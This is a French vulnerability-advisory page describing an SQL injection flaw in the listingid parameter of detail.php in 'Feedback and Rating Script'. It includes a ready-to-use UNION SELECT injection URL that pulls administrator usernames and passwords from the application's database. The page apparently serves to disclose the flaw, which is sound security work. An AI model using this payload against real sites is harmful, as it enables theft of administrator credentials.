Détail d'une fiche vulnérabilité
 
Feedback and Rating Script detail.php listingid Parameter SQL Injection 
 
     Fiche

Fiche créée le 2008-05-16 03:21:29, dernière mise à jour le 2009-10-23 05:58:53

Feedback and Rating Script contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'detail.php' script not properly sanitizing user-supplied input to the 'listingid' variable. This may allow an attacker to inject or manipulate SQL queries in the back-end database.


http://[target]/detail.php?listingid=-1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(0x757365726E616D653A20,username,0x70617373776F72643A,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/FROM/**/auto_admin_settings_tb/**/LIMIT 0,1/*
 
 
 
Référances externes :
OSVDB  45213
 
 
 
 

 
 


Consultation libre
 
  Remplissez un ou plusieurs des champs ci-dessous :
   
Vendeur
 
Titre
 
Reférence vulnérabilité
 
 
   
 
Alertes personnalisées
 
Vous déterminez grâce à un profile dynamique et assisté, tous vos équipements matériels et logiciels.
Nous vous informerons alors automatiquement, dès qu'une notification de sécurité concernera un ou plusieurs éléments de ce profile.
Chaque notification est précise, comprend de nombreuses informations afin de déterminer le risque et de s'en protéger.
 
Login:
Pass:
 
Inscription Gratuite en ligne
© Power4Security.com - BMS Ltd UK 2007-2008 - un site Power4Website.com
Partenaires : Anti-spam - Hébergement France - MySQL Php Suisse - Hosting Canada - Web Php Maroc - WebmasterMalin
Guide de l'affiliation - Guide du paiement électronique et de l'e-currency - Annuaire du Web - Solution e-commerce - Externalisation et outsourcing
e-Marketing et e-Mailing - Comparaison de services - Comparateur Marchands - Bons plans par email - Tests de personnalité et de QI
SMS API - Forums et Petites Annonces Gratuites - Rencontres - Sonneries - Offres du Web - Arrêter de fumer - Guide des mobiles et PDA